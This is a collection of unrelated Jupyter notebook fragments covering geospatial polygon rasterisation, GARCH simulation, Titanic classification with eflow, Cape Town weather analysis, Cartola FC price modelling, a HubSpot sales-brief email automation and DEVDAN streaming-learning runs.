Lastly, let's say we want to rasterise our converted polygons to create a numpy array mask. Let's use PIL to draw our polygon on a numpy array.
```
# initialise a numpy array
SOGE_mask = np.zeros((int(1000/25), int(1000/25))) # 1000m / 25m/px
# create an Image object
im = Image.fromarray(mask, mode='L')
# create an ImageDraw object
draw = ImageDraw.Draw(im)
# draw the polygon
draw.polygon(list(SOGE_pix.exterior.coords), fill=255)
# un-draw any holes in the polygon...
for hole in SOGE_pix.interiors:
draw.polygon(list(hole.coords), fill=0)
# return the image object to the mask array
SOGE_mask = np.array(im)
# visualise
fix, ax = plt.subplots(1,1,figsize=(4,4))
ax.imshow(SOGE_mask, origin='lower')
ax.plot(*SOGE_pix.exterior.xy, c='g')
plt.show()
```
### Vectorising
To complete the round-trip, lets perform a raster operation (say, a [simple binary dialation](https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.morphology.binary_dilation.html)), then re-vectorise our polygon and get it all the way back to native lat-lon coordinates. We'll use a vectoriser built with [skimage.measure.find_contours](https://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours).
```
def vectoriser(arr, disp=2):
"""
input: arr -> a square 2D binary mask array
output: polys -> a list of vectorised polygons
"""
polys = []
contours = measure.find_contours(np.pad(arr,disp,'constant', constant_values=(0)), 0.0001)
for c in contours:
c = (c-disp).clip(0.,float(arr.shape[0])) # clip back extraneous geomtries
c = np.round(c) # round to int
c.T[[0, 1]] = c.T[[1, 0]] # swap lons<->lats
poly = geometry.Polygon(c) # pass into geometry
polys.append(poly)
return polys
# grab the 0th element in the list of polygons
SOGE_dialated = vectoriser(binary_dilation(SOGE_mask>0))[0]
# Visualise
fig, ax = plt.subplots(1,1,figsize=(6,6))
ax.imshow(binary_dilation(SOGE_mask),origin='lower')
ax.plot(*SOGE_dialated.exterior.xy)
plt.show()
```
Now we need to convert this polygon in the pixel coordinate system back to the UTM coordinate system, and finally back to lon/lat. We do this by first reversing the affine transformation, and then reversing the projection.
```
GT_rev = [1/a,b,d,1/e,carfax_utm.x, carfax_utm.y]
# visualise
fig, axs = plt.subplots(1,2,figsize=(12,6))
#utm polygons
axs[0].plot(*affine_transform(SOGE_dialated, GT_rev).exterior.xy,c='r')
axs[0].plot(*SOGE_utm.exterior.xy, c='b')
axs[0].plot(*oxford_box.exterior.xy,c='g')
#lon/lat polygons
axs[1].plot(*transform(reproj_utm_wgs,affine_transform(SOGE_dialated, GT_rev)).exterior.xy,c='r')
axs[1].plot(*transform(reproj_utm_wgs,SOGE_utm).exterior.xy, c='b')
axs[1].plot(*transform(reproj_utm_wgs,oxford_box).exterior.xy,c='g')
plt.show()
```
| github_jupyter |
```
import sys
sys.path.insert(1, 'C:/Users/peter/Desktop/volatility-forecasting/midas')
from volatility import GARCH
from weights import Beta
from base import BaseModel
from helper_functions import create_matrix
import pandas as pd
import numpy as np
import time
import statsmodels.api as sm
def create_sim(sim_num = 500, sim_length = 500):
lls, alpha0, alpha1, beta1, runtime = np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num), np.zeros(sim_num)
model = GARCH(plot = False)
for i in range(sim_num):
np.random.seed(i)
y, _ = model.simulate(num = sim_length)
start = time.time()
model.fit(['', '01', '01', '01'], y)
runtime[i] = time.time() - start
# print("{}st iteration's runTime: {} sec.\n".format(i+1, round(runtime[i], 4)))
lls[i], alpha0[i], alpha1[i], beta1[i] = model.opt.fun, model.optimized_params[1], model.optimized_params[2], model.optimized_params[3]
return lls, alpha0, alpha1, beta1, runtime
sim500 = pd.DataFrame(create_sim(sim_length = 500))
sim1000 = pd.DataFrame(create_sim(sim_length = 1000))
sim2000 = pd.DataFrame(create_sim(sim_length = 2000))
sim5000 = pd.DataFrame(create_sim(sim_length = 5000))
sim500 = sim500.T
sim1000 = sim1000.T
sim2000 = sim2000.T
sim5000 = sim5000.T
alpha0_500 = sm.nonparametric.KDEUnivariate(sim500.iloc[:, 1].values)
alpha0_500.fit()
alpha0_1000 = sm.nonparametric.KDEUnivariate(sim1000.iloc[:, 1].values)
alpha0_1000.fit()
alpha0_2000 = sm.nonparametric.KDEUnivariate(sim2000.iloc[:, 1].values)
alpha0_2000.fit()
alpha0_5000 = sm.nonparametric.KDEUnivariate(sim5000.iloc[:, 1].values)
alpha0_5000.fit()
alpha1_500 = sm.nonparametric.KDEUnivariate(sim500.iloc[:, 2].values)
alpha1_500.fit()
alpha1_1000 = sm.nonparametric.KDEUnivariate(sim1000.iloc[:, 2].values)
alpha1_1000.fit()
alpha1_2000 = sm.nonparametric.KDEUnivariate(sim2000.iloc[:, 2].values)
alpha1_2000.fit()
alpha1_5000 = sm.nonparametric.KDEUnivariate(sim5000.iloc[:, 2].values)
alpha1_5000.fit()
beta1_500 = sm.nonparametric.KDEUnivariate(sim500.iloc[:, 3].values)
beta1_500.fit()
beta1_1000 = sm.nonparametric.KDEUnivariate(sim1000.iloc[:, 3].values)
beta1_1000.fit()
beta1_2000 = sm.nonparametric.KDEUnivariate(sim2000.iloc[:, 3].values)
beta1_2000.fit()
beta1_5000 = sm.nonparametric.KDEUnivariate(sim5000.iloc[:, 3].values)
beta1_5000.fit()
fig , ax = plt.subplots(3, 1, figsize=(10, 8), tight_layout=True)
ax[0].plot(alpha0_500.support, alpha0_500.density, lw = 3, label = 'N = 500', zorder = 10)
ax[0].plot(alpha0_1000.support, alpha0_1000.density, lw = 3, label = 'N = 1000', zorder = 10)
ax[0].plot(alpha0_2000.support, alpha0_2000.density, lw = 3, label = 'N = 2000', zorder = 10)
ax[0].plot(alpha0_5000.support, alpha0_5000.density, lw = 3, label = 'N = 5000', zorder = 10)
ax[0].set_title(r'$\alpha_0$'+" (Act = 0.2) parameter's density from different samples size")
ax[0].grid(True, zorder = -5)
ax[0].set_xlim((0.0, 1.0))
ax[0].legend(loc = 'best')
ax[1].plot(alpha1_500.support, alpha1_500.density, lw = 3, label = 'N = 500', zorder = 10)
ax[1].plot(alpha1_1000.support, alpha1_1000.density, lw = 3, label = 'N = 1000', zorder = 10)
ax[1].plot(alpha1_2000.support, alpha1_2000.density, lw = 3, label = 'N = 2000', zorder = 10)
ax[1].plot(alpha1_5000.support, alpha1_5000.density, lw = 3, label = 'N = 5000', zorder = 10)
ax[1].set_title(r'$\alpha_1$'+" (Act = 0.2) parameter's density from different samples size")
ax[1].grid(True, zorder = -5)
ax[1].set_xlim((0.0, 1.0))
ax[1].legend(loc = 'best')
ax[2].plot(beta1_500.support, beta1_500.density, lw = 3, label = 'N = 500', zorder = 10)
ax[2].plot(beta1_1000.support, beta1_1000.density, lw = 3, label = 'N = 1000', zorder = 10)
ax[2].plot(beta1_2000.support, beta1_2000.density, lw = 3, label = 'N = 2000', zorder = 10)
ax[2].plot(beta1_5000.support, beta1_5000.density, lw = 3, label = 'N = 5000', zorder = 10)
ax[2].set_title(r'$\beta_1$'+" (Act = 0.6) parameter's density from different samples size")
ax[2].grid(True, zorder = -5)
ax[2].set_xlim((0.0, 1.0))
ax[2].legend(loc = 'best')
plt.savefig('C:/Users/peter/Desktop/volatility-forecasting/results/garch_sim.png')
plt.show()
sim500.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_500.csv')
sim1000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_1000.csv')
sim2000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_2000.csv')
sim5000.to_csv('C:/Users/peter/Desktop/volatility-forecasting/results/garch_5000.csv')
```
| github_jupyter |
Find the markdown blocks that say interaction required! The notebook should take care of the rest!
# Import libs
```
import sys
import os
sys.path.append('..')
from eflow.foundation import DataPipeline,DataFrameTypes
from eflow.data_analysis import FeatureAnalysis, NullAnalysis
from eflow.model_analysis import ClassificationAnalysis
from eflow.data_pipeline_segments import FeatureTransformer, TypeFixer, DataEncoder, FeatureDataCleaner
from eflow.utils.modeling_utils import optimize_model_grid
from eflow.utils.eflow_utils import get_type_holder_from_pipeline, remove_unconnected_pipeline_segments
from eflow.utils.math_utils import get_unbalanced_threshold
from eflow.utils.sys_utils import create_dir_structure
from eflow.utils.eflow_utils import create_color_dict_for_features
from eflow.utils.pandas_utils import missing_values_table,data_types_table, value_counts_table, suggest_removal_features
from eflow.widgets import ColorLabelingWidget
import pandas as pd
import numpy as np
import scikitplot as skplt
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
import copy
from IPython.display import clear_output
from IPython.core.getipython import get_ipython
import ipython_blocking
# # Additional add ons
# !pip install pandasgui
# !pip install pivottablejs
# clear_output()
%matplotlib notebook
%matplotlib inline
```
## Declare Project Variables
### Interaction required
```
dataset_path = "Datasets/titanic_train.csv"
# -----
dataset_name = "Titanic Data"
pipeline_name = "Titanic Pipeline"
# -----
# -----
notebook_mode = True
```
## Clean out segment space
```
remove_unconnected_pipeline_segments()
```
# Import dataset
```
df = pd.read_csv(dataset_path)
shape_df = pd.DataFrame.from_dict({'Rows': [df.shape[0]],
'Columns': [df.shape[1]]})
display(shape_df)
display(df.head(30))
data_types_table(df)
```
# Loading and init df_features
```
# Option: 1
# df_features = get_type_holder_from_pipeline(pipeline_name)
# Option: 2
df_features = DataFrameTypes()
df_features.init_on_json_file(os.getcwd() + f"/eflow Data/{dataset_name}/df_features.json")
df_features.display_features(display_dataframes=True,
notebook_mode=notebook_mode)
```
# Any extra processing before eflow DataPipeline
# Setup pipeline structure
### Interaction Required
```
main_pipe = DataPipeline(pipeline_name,
df,
df_features)
main_pipe.perform_pipeline(df,
df_features)
df
```
# Seperate out data into train and test sets
```
X = df.drop(columns=df_features.target_feature()).values
y = df[df_features.target_feature()].values
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.80, random_state=517, stratify=y,
)
```
# Fit Models and view results
```
# Find best parameters for model
param_grid = {
"max_depth": list(range(1, 4)),
# "min_samples_leaf": list(range(80, 130, 5)),
# "criterion": ["gini", "entropy"],
# "n_splits": [20, 30]
}
model, best_params = optimize_model_grid(
model=DecisionTreeClassifier(),
X_train=X_train,
y_train=y_train,
param_grid=param_grid,
scoring="f1_micro"
)
model_name = repr(model).split("(")[0]
dt_model_analysis = ClassificationAnalysis(dataset_name=dataset_name,
model=model,
model_name=model_name,
target_feature=df_features.target_feature(),
pred_funcs_dict={"Probabilities function":model.predict_proba,
"Predict function":model.predict},
sample_data=X_train[0],
project_sub_dir='Classification Analysis',
notebook_mode=notebook_mode,
df_features=df_features)
dt_model_analysis.perform_analysis(X=X_train,
y=y_train,
dataset_name="Train Data",
thresholds_matrix=[[.0,.0],],
display_visuals=True)
dt_model_analysis.perform_analysis(X=X_test,
y=y_test,
dataset_name="Test Data",
display_visuals=True)
```
| github_jupyter |
I visited capetown in 2018. It was my first international travel so the city remains special to me. I would love to go back there one day. Inspired by this, i choose to do a brief weather analysis on it to know the best time to visit. I cannot wait to have a taste of the fine Stellenbosch wine!
The goal here is to have fun sooo remember this next line of code!!
```
pip install emoji
```
# Getting Data
I got the data from http://www.wunderground.com/history and downloaded it to my local PC as a CSV file.
```
import pandas as pd
df = pd.read_csv ("C:\\Users\\hp\\Documents\\Downloads\\Data Analysis-Pandas\\Data Analysis-Pandas-2\\CapeTown_CPT_2014.csv")
#lets check the data to see if we got it right
df.head()
```
perfect! If you want to a certain number of rows, you can pass the number to the df.head() but otherwise it gives 5 as default
# Cleaning the data
The next step will be refining our data. In some cases as a data scientist, you will be required to analyse data that you were not involved in collecting and as a result, there may be many unnecessary details in the data. (well this may also happend when you collect data yourself!). It is therefore key to clean your data and have only what is important for you
1. First we need to clean up the data. Lets rename the superfulous column name 'WindDirDegrees< br />' to 'WindDirDegrees
```
df = df.rename(columns = {'WindDirDegrees<br />' : 'WindDirDegrees'})
```
2. Remove the HTML tag <br/>
```
df['WindDirDegrees'] =df['WindDirDegrees'].str.rstrip('<br />')
df.dtypes
```
Change the value in the WindDirDegrees to float and the GMT to datetime
```
df['WindDirDegrees'] = df['WindDirDegrees'].astype('float64')
df['Date'] = pd.to_datetime(df['Date'])
#change default index to the datetime64
df.index = df['Date']
```
Great. we are all set regarding our data types
# Finding a summer break
A quick wiki search says that summer in Capetown is from November to march. Thats perfect timing because my birthday is in November!! (Doing a happy dance here.
```
from datetime import datetime
summer = df.loc[datetime(2014,1,1) : datetime(2014,3,16)]
#Lets fnd the super warm days so we know when to hit the beach in those bikini bodies! haha
summer[summer['Mean TemperatureC'] >= 25]
%matplotlib inline
#Lets visualize this in a line graph
summer['Mean TemperatureC'].plot(grid=True, figsize=(10,5),legend= "top left")
```
looks like we have fairly warm days distributed throughout the whole perioid. Lets check for rainy days as well. From what i remember, morning showers were a common thing in capetown
```
summer[['Mean TemperatureC', 'Precipitationmm']].plot(grid=True, figsize=(10,5))
```
GREAT! looks like we only have a few rainy days in the beginning of the year. We could spend those snuggled up in bed with a bestseller. Have you read "Going Home" by Yaa Gyasi? NO? Buy that book and thank me later!
Conclusion
The weather in CapeTown looks frindsly throughout summer. Some days in January are quite cold with rain so if you're totally avoiding winter weather, avoid January and probably plan your trip for February where its all sun and no rain.
Finnaly, have fun in Madiba Land.
| github_jupyter |
# Descobrindo o algoritmo de valorização do Cartola FC - Parte I
## Explorando o algoritmo de valorização do Cartola.
Olá! Este é o primeiro tutorial da série que tentará descobrir o algoritmo de valorização do Cartola FC. Neste primeiro estudo, nós iremos:
1. Avaliar o sistema de valorizção ao longo das rodadas;
2. Estudar a distribuição a variação para cada rodada;
3. Realizar um estudo de caso com um jogador específico, estudando sua valorização e criando um modelo específico de valorização para o jogador.
Além disso, você estudará análise de dados usando Python com Pandas, Seaborn, Sklearn. Espero que você tenha noção sobre:
* Modelos lineares
* Análise de séries temporais
* Conhecimentos básicos do Cartola FC.
```
# Importar bibliotecas
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
pd.options.mode.chained_assignment = None # default='warn'
# Abrir banco de dados
dados = pd.read_csv('~/caRtola/data/desafio_valorizacao/valorizacao_cartola_2018.csv')
# Listar nome das variáveis
str(list(dados))
# Selecionar variáveis para análise
dados = dados[['slug', 'rodada', 'posicao',
'status', 'variacao_preco', 'pontos',
'preco', 'media_pontos']]
# Explorar dados de apenas um jogador
paqueta = dados[dados.slug == 'lucas-paqueta']
paqueta.head(n=15)
```
Algumas observações sobre a estrutura dos dados. Na linha '21136', Paquetá está como dúvida é teve pontuação de 0. Na linha abaixo ('21137'), ele está suspenso, no entanto pontuou.
A explicação para este erro nos dados está ligada em como os dados da API da Globo são organizados. Embora para o front-end do Cartola os dados estejam corretos, para nossa análise eles são inadequados. Por quê?
Vamos pensar que você está escalando para a rodada 38. Para esta rodada, a pontuação do jogador ainda não está disponível, somente a variação do seu preço, sua média e seu preço _até_ a rodada 38. Assim, precisamos ajustar a coluna 'pontos', usando uma técnica simples de deslocar (lag) os dados da coluna. Além disso, precisaremos aplicar o mesmo processo na coluna 'variacao_preco' que também está ligada aos dados da rodada anterior.
Assim, a coluna 'variacao_preco' e 'pontos' estão deslocadas para cima e precisam ser corrigidas;
```
# Criar coluna variacao_preco_lag e pontos_lag
paqueta['variacao_preco_lag'] = paqueta['variacao_preco'].shift(1)
paqueta['pontos_lag'] = paqueta['pontos'].shift(1)
paqueta['media_lag'] = paqueta['media_pontos'].shift(-1)
paqueta[['slug', 'rodada', 'status',
'pontos_lag', 'variacao_preco_lag',
'preco', 'media_pontos']].head(n=15)
```
Como podemos observar na tabela acima, os novos atributos que criamos agora estão alinhados com o status do atleta e poderão nos ajudar na etapa da modelagem. Antes de modelar, vamos explorar ainda nossos dados.
Primeira, observação para entendermos o modelo. O jogador quando está suspenso (linha 21137) ou seu status é nulo, não houve variação de preço. Há também outro ponto a ser observado, caso a pontuação do atleta seja positiva, há uma tendência de valorização. Vamos analisar isso nos dois gráficos abaixo.
```
# Transformar dados para plotar resultados
paqueta_plot = pd.melt(paqueta,
id_vars=['slug','rodada'],
value_vars=['variacao_preco_lag', 'pontos_lag', 'preco'])
# Plotar gráfico com variacao_preco_lag, pontos_lag e preco
plt.figure(figsize=(16, 6))
g = sns.lineplot(x='rodada', y='value', hue='variable', data=paqueta_plot)
```
Neste gráfico, podemos observar que o preço do atleta foi razoavelmente estável ao longo do tempo. Ao observar o comportamento das linhas azul e laranja, conseguimos notar que quando uma linha tem inclinação negativa a outra parece acompanhar. Isso nos leva a concluir o óbvio, a pontuação do atleta está ligada diretamente a sua variação de preço.
```
plt.figure(figsize=(16, 6))
g = sns.scatterplot(x='pontos_lag', y='variacao_preco_lag', hue='status', data=paqueta)
```
Opa, aparentemente há uma relação entre os pontos e a variação do preço. Vamos analisar a matriz de correlação.
```
paqueta[['pontos_lag','variacao_preco_lag','preco','media_pontos']].corr()
```
Temos algumas informações uteis que saíram da matriz de correlação. Primeira, a pontuação está correlacionada positivamente com a variação e o preço do atleta negativamente correlacionada. Estas duas variáveis já podem nos ajudar a montar um modelo.
```
# Set predictors and dependent variable
paqueta_complete = paqueta[(~paqueta.status.isin(['Nulo', 'Suspenso'])) & (paqueta.rodada > 5)]
paqueta_complete = paqueta_complete.dropna()
predictors = paqueta_complete[['pontos_lag','preco','media_lag']]
outcome = paqueta_complete['variacao_preco_lag']
regr = linear_model.LinearRegression()
regr.fit(predictors, outcome)
paqueta_complete['predictions'] = regr.predict(paqueta_complete[['pontos_lag', 'preco', 'media_lag']])
print('Intercept: \n', regr.intercept_)
print('Coefficients: \n', regr.coef_)
print("Mean squared error: %.2f"
% mean_squared_error(paqueta_complete['variacao_preco_lag'], paqueta_complete['predictions']))
print('Variance score: %.2f' % r2_score(paqueta_complete['variacao_preco_lag'], paqueta_complete['predictions']))
```
Boa notícia! Nós estamos prevendo os resultados do jogador muito bem. O valor é aproximado, mas nada mal! A fórmula de valorização do jogador para uma dada rodada é:
$$ Variacao = 16.12 + (pontos * 0,174) - (preco * 0,824) + (media * 0,108) $$
Vamos abaixo em que medida nossas predições são compatíveis com o desempenho do jogador.
```
# Plotar variação do preço por valor previsto do modelo linear.
plt.figure(figsize=(8, 8))
g = sns.regplot(x='predictions',y='variacao_preco_lag', data=paqueta_complete)
# Plotar linhas com rodadas para avaliar se estamos errando alguma rodada específica
for line in range(0, paqueta_complete.shape[0]):
g.text(paqueta_complete.iloc[line]['predictions'],
paqueta_complete.iloc[line]['variacao_preco_lag']-0.25,
paqueta_complete.iloc[line]['rodada'],
horizontalalignment='right',
size='medium',
color='black',
weight='semibold')
```
Nossa previsão para o jogador Paquetá estão muito boas. Não descobrimos o algoritmo do Cartola, mas já temos uma aproximação acima do razoável. Será que nosso modelo é generalizável aos outros jogadores?
Acompanhe nossa próxima publicação...
| github_jupyter |
<img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3f/HubSpot_Logo.svg/220px-HubSpot_Logo.svg.png" alt="drawing" width="200" align='left'/>
# Hubspot - Send sales brief
<a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/Hubspot/Hubspot_send_sales_brief.ipynb" target="_parent"><img src="https://img.shields.io/badge/-Open%20in%20Naas-success?labelColor=000000&logo=data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyB3aWR0aD0iMTAyNHB4IiBoZWlnaHQ9IjEwMjRweCIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgdmVyc2lvbj0iMS4xIj4KIDwhLS0gR2VuZXJhdGVkIGJ5IFBpeGVsbWF0b3IgUHJvIDIuMC41IC0tPgogPGRlZnM+CiAgPHRleHQgaWQ9InN0cmluZyIgdHJhbnNmb3JtPSJtYXRyaXgoMS4wIDAuMCAwLjAgMS4wIDIyOC4wIDU0LjUpIiBmb250LWZhbWlseT0iQ29tZm9ydGFhLVJlZ3VsYXIsIENvbWZvcnRhYSIgZm9udC1zaXplPSI4MDAiIHRleHQtZGVjb3JhdGlvbj0ibm9uZSIgZmlsbD0iI2ZmZmZmZiIgeD0iMS4xOTk5OTk5OTk5OTk5ODg2IiB5PSI3MDUuMCI+bjwvdGV4dD4KIDwvZGVmcz4KIDx1c2UgaWQ9Im4iIHhsaW5rOmhyZWY9IiNzdHJpbmciLz4KPC9zdmc+Cg=="/></a>
## Input
### Import library
```
from naas_drivers import emailbuilder, hubspot
import naas
import pandas as pd
from datetime import datetime
```
### Enter your Hubspot api key
```
auth_token = 'YOUR_HUBSPOT_API_KEY'
```
### Connect to Hubspot
```
hs = hubspot.connect(auth_token)
```
### Email parameters
```
# Receivers
email_to = ["your_email_adresse"]
# Email subject
email_subject = f"🚀 Hubspot - Sales Brief as of {datetime.now().strftime('%d/%m/%Y')} (Draft)"
```
### Sales target
```
objective = 300000
```
### Pick your pipeline
#### Get all pipelines
```
df_pipelines = hs.pipelines.get_all()
df_pipelines
```
#### Enter your pipeline id
```
pipeline_id = "8432671"
```
### Constants
```
HUBSPOT_CARD = "https://lib.umso.co/lib_sluGpRGQOLtkyEpz/na1lz0v9ejyurau2.png?w=1200&h=900&fit=max&dpr=2"
NAAS_WEBSITE = "https://www.naas.ai"
EMAIL_DESCRIPTION = "Your sales brief"
DATE_FORMAT = "%Y-%m-%d"
```
### Schedule automation
```
naas.scheduler.add(cron="0 8 * * 1")
```
### Get dealstages from pipeline
```
df_dealstages = df_pipelines.copy()
# Filter on pipeline
df_dealstages = df_dealstages[df_dealstages.pipeline_id == pipeline_id]
df_dealstages
```
### Get deals from pipeline
```
properties = [
"hs_object_id",
"dealname",
"dealstage",
"pipeline",
"createdate",
"hs_lastmodifieddate",
"closedate",
"amount"
]
df_deals = hs.deals.get_all(properties)
# Filter on pipeline
df_deals = df_deals[df_deals.pipeline == pipeline_id].reset_index(drop=True)
df_deals
```
## Model
### Formatting functions
```
def format_number(num):
NUMBER_FORMAT = "{:,.0f} €"
num = str(NUMBER_FORMAT.format(num)).replace(",", " ")
return num
def format_pourcentage(num):
NUMBER_FORMAT = "{:,.0%}"
num = str(NUMBER_FORMAT.format(num))
return num
def format_varv(num):
NUMBER_FORMAT = "+{:,.0f} €"
num = str(NUMBER_FORMAT.format(num)).replace(",", " ")
return num
```
### Create sales pipeline database
```
df_sales = pd.merge(df_deals.drop("pipeline", axis=1),
df_dealstages.drop(["pipeline", "pipeline_id", "createdAt", "updatedAt", "archived"], axis=1),
left_on="dealstage",
right_on="dealstage_id",
how="left")
df_sales
df_sales_c = df_sales.copy()
# Cleaning
df_sales_c["amount"] = df_sales_c["amount"].fillna("0")
df_sales_c.loc[df_sales_c["amount"] == "", "amount"] = "0"
# Formatting
df_sales_c["amount"] = df_sales_c["amount"].astype(float)
df_sales_c["probability"] = df_sales_c["probability"].astype(float)
df_sales_c.createdate = pd.to_datetime(df_sales_c.createdate)
df_sales_c.hs_lastmodifieddate = pd.to_datetime(df_sales_c.hs_lastmodifieddate)
df_sales_c.closedate = pd.to_datetime(df_sales_c.closedate)
# Calc
df_sales_c["forecasted"] = df_sales_c["amount"] * df_sales_c["probability"]
df_sales_c
```
### Create sales pipeline agregated by dealstages
```
df_details = df_sales_c.copy()
# Groupby
to_group = [
"dealstage_label",
"probability",
"displayOrder"
]
to_agg = {
"amount": "sum",
"dealname": "count",
"forecasted": "sum"
}
df_details = df_details.groupby(to_group, as_index=False).agg(to_agg)
# Sort
df_details = df_details.sort_values("displayOrder")
df_details
```
### Calculate email parameters
```
forecasted = df_details.forecasted.sum()
forecasted
won = df_details[df_details["probability"] == 1].forecasted.sum()
won
weighted = df_details[df_details["probability"] < 1].forecasted.sum()
weighted
completion_p = forecasted / objective
completion_p
completion_v = objective - forecasted
completion_v
today = datetime.now().strftime(DATE_FORMAT)
today
```
### Get pipeline details
```
df = df_details.copy()
details = []
for _, row in df.iterrows():
# status part
dealstage = row.dealstage_label
probability = row.probability
detail = f"{dealstage} ({format_pourcentage(probability)})"
# amount part
amount = row.amount
number = row.dealname
forecasted_ = row.forecasted
if (probability < 1 and probability > 0):
detail = f"{detail}: <ul><li>Amount : {format_number(amount)}</li><li>Number : {number}</li><li>Weighted amount : <b>{format_number(forecasted_)}</b></li></ul>"
else:
detail = f"{detail}: {format_number(amount)}"
details += [detail]
details
```
### Get inactives deals
```
df_inactive = df_sales_c.copy()
df_inactive.hs_lastmodifieddate = pd.to_datetime(df_inactive.hs_lastmodifieddate).dt.strftime(DATE_FORMAT)
df_inactive["inactive_time"] = (datetime.now() - pd.to_datetime(df_inactive.hs_lastmodifieddate, format=DATE_FORMAT)).dt.days
df_inactive.loc[(df_inactive["inactive_time"] > 30, "inactive")] = "inactive"
df_inactive = df_inactive[(df_inactive.inactive == 'inactive') &
(df_inactive.amount != 0) &
(df_inactive.probability > 0.) &
(df_inactive.probability < 1)].sort_values("amount", ascending=False).reset_index(drop=True)
df_inactive
inactives = []
for _, row in df_inactive[:10].iterrows():
# status part
dealname = row.dealname
dealstage_label = row.dealstage_label
amount = row.amount
probability = row.probability
inactive = f"{dealname} ({dealstage_label}): <b>{format_number(amount)}</b>"
inactives += [inactive]
inactives
```
### Create pipeline waterfall
```
import plotly.graph_objects as go
fig = go.Figure(go.Waterfall(name="20",
orientation = "v",
measure = ["relative", "relative", "total", "relative", "total"],
x = ["Won", "Pipeline", "Forecast", "Missing", "Objective"],
textposition = "outside",
text = [format_number(won), format_varv(weighted), format_number(forecasted), format_varv(completion_v), format_number(objective)],
y = [won, weighted, forecasted, completion_v, objective],
decreasing = {"marker":{"color":"#33475b"}},
increasing = {"marker":{"color":"#33475b"}},
totals = {"marker":{"color":"#ff7a59"}}
))
fig.update_layout(title = "Sales Metrics", plot_bgcolor="#ffffff", hovermode='x')
fig.update_yaxes(tickprefix="€", gridcolor='#eaeaea')
fig.show()
fig.write_html("GRAPH_FILE.html")
fig.write_image("GRAPH_IMG.png")
params = {"inline": True}
graph_url = naas.asset.add("GRAPH_FILE.html", params=params)
graph_image = naas.asset.add("GRAPH_IMG.png")
```
### Create email
```
def email_brief(today,
forecasted,
won,
weighted,
objective,
completion_p,
completion_v,
details,
inactives
):
content = {
'title': (f"<a href='{NAAS_WEBSITE}'>"
f"<img align='center' width='100%' target='_blank' style='border-radius:5px;'"
f"src='{HUBSPOT_CARD}' alt={EMAIL_DESCRIPTION}/>"
"</a>"),
'txt_intro': (f"Hi there,<br><br>"
f"Here is your weekly sales email as of {today}."),
'title_1': emailbuilder.text("Overview", font_size="27px", text_align="center", bold=True),
"text_1": emailbuilder.text(f"As of today, your yearly forecasted revenue is {format_number(forecasted)}."),
"list_1": emailbuilder.list([f"Won : {format_number(won)}",
f"Weighted pipeline : <b>{format_number(weighted)}</b>"]),
"text_1_2": emailbuilder.text(f"You need to find 👉 <u>{format_number(completion_v)}</u> to reach your goal !"),
"text_1_1": emailbuilder.text(f"Your yearly objective is {format_number(objective)} ({format_pourcentage(completion_p)} completion)."),
'image_1': emailbuilder.image(graph_image, link=graph_url),
'title_2': emailbuilder.text("🚀 Pipeline", font_size="27px", text_align="center", bold=True),
"list_2": emailbuilder.list(details),
'title_3': emailbuilder.text("🧐 Actions needed", font_size="27px", text_align="center", bold=True),
'text_3': emailbuilder.text("Here are deals where you need to take actions :"),
'list_3': emailbuilder.list(inactives),
'text_3_1': emailbuilder.text("If you need more details, connect to Hubspot with the link below."),
'button_1': emailbuilder.button(link="https://app.hubspot.com/",
text="Go to Hubspot",
background_color="#ff7a59"),
'title_4': emailbuilder.text("Glossary", text_align="center", bold=True, underline=True),
'list_4': emailbuilder.list(["Yearly forecasted revenue : Weighted amount + WON exclude LOST",
"Yearly objective : Input in script",
"Inactive deal : No activity for more than 30 days"]),
'footer_cs': emailbuilder.footer_company(naas=True),
}
email_content = emailbuilder.generate(display='iframe', **content)
return email_content
email_content = email_brief(today,
forecasted,
won,
weighted,
objective,
completion_p,
completion_v,
details,
inactives)
```
## Output
### Send email
```
naas.notification.send(email_to,
email_subject,
email_content)
```
| github_jupyter |
```
from DEVDANmainloop import DEVDANmain, DEVDANmainID
from DEVDANbasic import DEVDAN
from utilsDEVDAN import dataLoader, plotPerformance
import random
import numpy as np
import torch
# random seed control
np.random.seed(0)
torch.manual_seed(0)
random.seed(0)
# load data
dataStreams = dataLoader('../dataset/hepmass2.mat')
print('All Data')
allMetrics = []
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet0, performanceHistory0, allPerformance = DEVDANmain(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory0[0],performanceHistory0[1],performanceHistory0[2],
performanceHistory0[3],performanceHistory0[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet1, performanceHistory1, allPerformance = DEVDANmain(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory1[0],performanceHistory1[1],performanceHistory1[2],
performanceHistory1[3],performanceHistory1[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet2, performanceHistory2, allPerformance = DEVDANmain(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory2[0],performanceHistory2[1],performanceHistory2[2],
performanceHistory2[3],performanceHistory2[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet3, performanceHistory3, allPerformance = DEVDANmain(DevdanNet,dataStreams)
